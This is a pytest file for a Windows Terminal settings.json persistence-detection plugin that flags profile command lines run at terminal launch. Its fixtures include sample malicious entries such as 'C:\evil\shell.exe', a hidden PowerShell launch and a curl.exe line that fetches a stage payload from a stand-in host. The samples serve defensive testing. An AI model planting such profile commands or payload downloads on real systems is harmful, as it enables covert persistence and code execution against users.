"""Tests for the Windows Terminal settings.json profile plugin (T1546)."""

from __future__ import annotations

import json
from pathlib import Path

import pytest
from pyrsistencesniper.core.models import AccessLevel
from pyrsistencesniper.core.registry import artifact_failures
from pyrsistencesniper.core.windows import _io_path
from pyrsistencesniper.plugins.T1546.windows_terminal import (
    WindowsTerminal,
    strip_jsonc,
)

from ..conftest import remove_over_length_tree
from .conftest import make_plugin, make_user_profiles, setup_filesystem

_PACKAGED = (
    r"AppData\Local\Packages"
    r"\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json"
)
_PREVIEW = (
    r"AppData\Local\Packages"
    r"\Microsoft.WindowsTerminalPreview_8wekyb3d8bbwe\LocalState\settings.json"
)
_UNPACKAGED = r"AppData\Local\Microsoft\Windows Terminal\settings.json"

_GENERATED_HEADER = (
    "// This file was initially generated by Windows Terminal 1.22.12111.0\n"
    "// It should still be usable in newer versions, but newer versions might have\n"
    "// additional settings, help text, or changes that you will not see unless you\n"
    "// clear this file and let us generate a new one for you.\n"
)


def _terminal_plugin(tmp_path: Path, *usernames: str) -> object:
    """Build the plugin over the given user profiles, defaulting to one user."""
    return make_plugin(
        WindowsTerminal,
        tmp_path,
        user_profiles=make_user_profiles(*(usernames or ("user1",))),
    )


def _write_settings(plugin: object, username: str, location: str, text: str) -> None:
    """Drop one settings.json under a user's profile at a literal location."""
    setup_filesystem(plugin, {f"Users\\{username}\\{location}": text})


def test_object_form_suspicious_commandline(tmp_path: Path) -> None:
    """A profile command line is user-controlled and runs on terminal launch."""
    plugin = _terminal_plugin(tmp_path)
    data = {"profiles": {"list": [{"commandline": "C:\\evil\\shell.exe"}]}}
    _write_settings(plugin, "user1", _PACKAGED, json.dumps(data))
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].value == "C:\\evil\\shell.exe"
    assert findings[0].access_gained == AccessLevel.USER
    assert findings[0].path == f"Users\\user1\\{_PACKAGED}"


def test_default_commandline_still_emits_finding(tmp_path: Path) -> None:
    """Plugin emits every profile entry; classification is what filters defaults."""
    plugin = _terminal_plugin(tmp_path)
    data = {"profiles": {"list": [{"commandline": "cmd.exe"}]}}
    _write_settings(plugin, "user1", _PACKAGED, json.dumps(data))
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].value == "cmd.exe"


def test_profile_no_commandline(tmp_path: Path) -> None:
    """A profile with no commandline inherits the shell and is not persistence."""
    plugin = _terminal_plugin(tmp_path)
    data = {"profiles": {"list": [{"name": "Default"}]}}
    _write_settings(plugin, "user1", _PACKAGED, json.dumps(data))
    assert plugin.run() == []


def test_generated_comment_header_and_trailing_comma_are_parsed(tmp_path: Path) -> None:
    """Terminal ships JSONC; a commented file with a trailing comma must still parse."""
    plugin = _terminal_plugin(tmp_path)
    text = (
        _GENERATED_HEADER + '{\n    "profiles": {\n        "list": [\n'
        '            { "commandline": "C:\\\\evil\\\\shell.exe" },\n'
        "        ]\n    },\n}\n"
    )
    with pytest.raises(json.JSONDecodeError):
        json.loads(text)
    _write_settings(plugin, "user1", _PACKAGED, text)
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].value == "C:\\evil\\shell.exe"


def test_block_comment_is_stripped(tmp_path: Path) -> None:
    """Terminal also accepts block comments, which plain json.loads rejects."""
    plugin = _terminal_plugin(tmp_path)
    text = (
        "{\n    /* disabled while testing */\n"
        '    "profiles": { "list": ['
        ' { "commandline": "C:\\\\evil\\\\shell.exe" } ] }\n}'
    )
    _write_settings(plugin, "user1", _PACKAGED, text)
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].value == "C:\\evil\\shell.exe"


def test_comment_marker_inside_a_string_literal_survives(tmp_path: Path) -> None:
    """A // inside a URL is data, not a comment, and must survive the strip."""
    plugin = _terminal_plugin(tmp_path)
    commandline = "curl.exe https://example.test//stage/payload.ps1 -o C:\\a.ps1"
    text = _GENERATED_HEADER + json.dumps(
        {
            "$help": "https://aka.ms/terminal-documentation",
            "profiles": {"list": [{"commandline": commandline}]},
        }
    )
    _write_settings(plugin, "user1", _PACKAGED, text)
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].value == commandline


def test_escaped_quote_before_comment_marker_survives() -> None:
    """An escaped quote must not end the string and expose a // inside it."""
    commandline = 'cmd.exe /c echo \\" // not a comment'
    text = f'{{"profiles": {{"list": [{{"commandline": "{commandline}"}}]}}}}'
    assert json.loads(strip_jsonc(text)) == json.loads(text)


def test_array_form_profiles_is_parsed(tmp_path: Path) -> None:
    """The schema allows a bare profiles array; the old code raised AttributeError."""
    plugin = _terminal_plugin(tmp_path)
    data = {"profiles": [{"name": "PowerShell", "commandline": "powershell -w hidden"}]}
    _write_settings(plugin, "user1", _PACKAGED, json.dumps(data))
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].value == "powershell -w hidden"


@pytest.mark.parametrize("document", ["[]", '"x"', "5", "null", '{"profiles": 7}'])
def test_non_object_document_stays_quiet(tmp_path: Path, document: str) -> None:
    """A settings.json of the wrong shape yields nothing and must never raise."""
    plugin = _terminal_plugin(tmp_path)
    _write_settings(plugin, "user1", _PACKAGED, document)
    assert plugin.run() == []


def test_one_crafted_profile_does_not_blind_other_users(tmp_path: Path) -> None:
    """A hostile settings.json in an earlier user must not kill the whole check."""
    plugin = _terminal_plugin(tmp_path, "alice", "bob")
    _write_settings(plugin, "alice", _PACKAGED, json.dumps({"profiles": []}))
    _write_settings(
        plugin,
        "bob",
        _PACKAGED,
        json.dumps({"profiles": {"list": [{"commandline": "C:\\evil\\shell.exe"}]}}),
    )
    findings = plugin.run()
    assert [finding.value for finding in findings] == ["C:\\evil\\shell.exe"]
    assert findings[0].path == f"Users\\bob\\{_PACKAGED}"


def test_profiles_defaults_commandline_is_reported(tmp_path: Path) -> None:
    """A command line on profiles.defaults applies to every profile in the terminal."""
    plugin = _terminal_plugin(tmp_path)
    data = {
        "profiles": {
            "defaults": {"commandline": "C:\\evil\\shell.exe"},
            "list": [{"name": "Command Prompt"}],
        }
    }
    _write_settings(plugin, "user1", _PACKAGED, json.dumps(data))
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].value == "C:\\evil\\shell.exe"


def test_empty_defaults_object_stays_quiet(tmp_path: Path) -> None:
    """Terminal writes "defaults": {} by default, which is not a finding."""
    plugin = _terminal_plugin(tmp_path)
    data = {"profiles": {"defaults": {}, "list": [{"name": "Command Prompt"}]}}
    _write_settings(plugin, "user1", _PACKAGED, json.dumps(data))
    assert plugin.run() == []


def test_preview_package_is_read(tmp_path: Path) -> None:
    """The Preview channel keeps its settings under its own package family name."""
    plugin = _terminal_plugin(tmp_path)
    data = {"profiles": {"list": [{"commandline": "C:\\evil\\preview.exe"}]}}
    _write_settings(plugin, "user1", _PREVIEW, json.dumps(data))
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].path == f"Users\\user1\\{_PREVIEW}"


def test_unpackaged_install_is_read(tmp_path: Path) -> None:
    """The unpackaged install stores settings outside AppData\\Local\\Packages."""
    plugin = _terminal_plugin(tmp_path)
    data = {"profiles": {"list": [{"commandline": "C:\\evil\\unpackaged.exe"}]}}
    _write_settings(plugin, "user1", _UNPACKAGED, json.dumps(data))
    findings = plugin.run()
    assert len(findings) == 1
    assert findings[0].path == f"Users\\user1\\{_UNPACKAGED}"


def test_malformed_json_reports_lost_coverage(tmp_path: Path) -> None:
    """A settings.json that exists but will not parse is coverage the scan lost."""
    plugin = _terminal_plugin(tmp_path)
    _write_settings(plugin, "user1", _PACKAGED, "{broken json!!!")
    assert plugin.run() == []
    failures = artifact_failures()
    assert len(failures) == 1
    assert failures[0].check_id.startswith("windows_terminal artifact ")
    # The ledger names the artifact by its host path, whose separator is the
    # analyst's, so the identity is compared as a path and not as a substring.
    resolved = plugin.filesystem.resolve(rf"Users\user1\{_PACKAGED}")
    assert str(resolved) in failures[0].check_id


def test_absent_settings_file_is_silent(tmp_path: Path) -> None:
    """A user without Windows Terminal is a real negative, not lost coverage."""
    plugin = _terminal_plugin(tmp_path)
    assert plugin.run() == []
    assert artifact_failures() == ()


def test_strip_jsonc_leaves_a_plain_document_untouched() -> None:
    """A file with no comments and no trailing commas passes through unchanged."""
    text = json.dumps({"profiles": {"list": [{"commandline": "a//b"}]}}, indent=4)
    assert strip_jsonc(text) == text


def _over_length_username(tmp_path: Path) -> str:
    """Name a user whose settings.json lands past the length Win32 will open."""
    username = "u"
    while len(str(tmp_path.joinpath("Users", username, *_PACKAGED.split("\\")))) < 270:
        username += "x"
    return username


def test_settings_beyond_the_win32_path_limit_is_parsed(tmp_path: Path) -> None:
    """An over-length settings.json is read, not confirmed present and then dropped."""
    username = _over_length_username(tmp_path)
    settings_path = tmp_path.joinpath("Users", username, *_PACKAGED.split("\\"))
    plugin = _terminal_plugin(tmp_path, username)
    document = json.dumps(
        {"profiles": {"list": [{"commandline": "C:\\evil\\shell.exe"}]}}
    )

    try:
        _io_path(settings_path.parent).mkdir(parents=True, exist_ok=True)
        _io_path(settings_path).write_text(document, encoding="utf-8")

        findings = plugin.run()
        assert len(findings) == 1
        assert findings[0].value == "C:\\evil\\shell.exe"
        assert artifact_failures() == ()
    finally:
        remove_over_length_tree(settings_path, tmp_path)


def test_absent_over_length_settings_file_is_silent(tmp_path: Path) -> None:
    """A user without Windows Terminal is a real negative at any path length."""
    plugin = _terminal_plugin(tmp_path, _over_length_username(tmp_path))
    assert plugin.run() == []
    assert artifact_failures() == ()
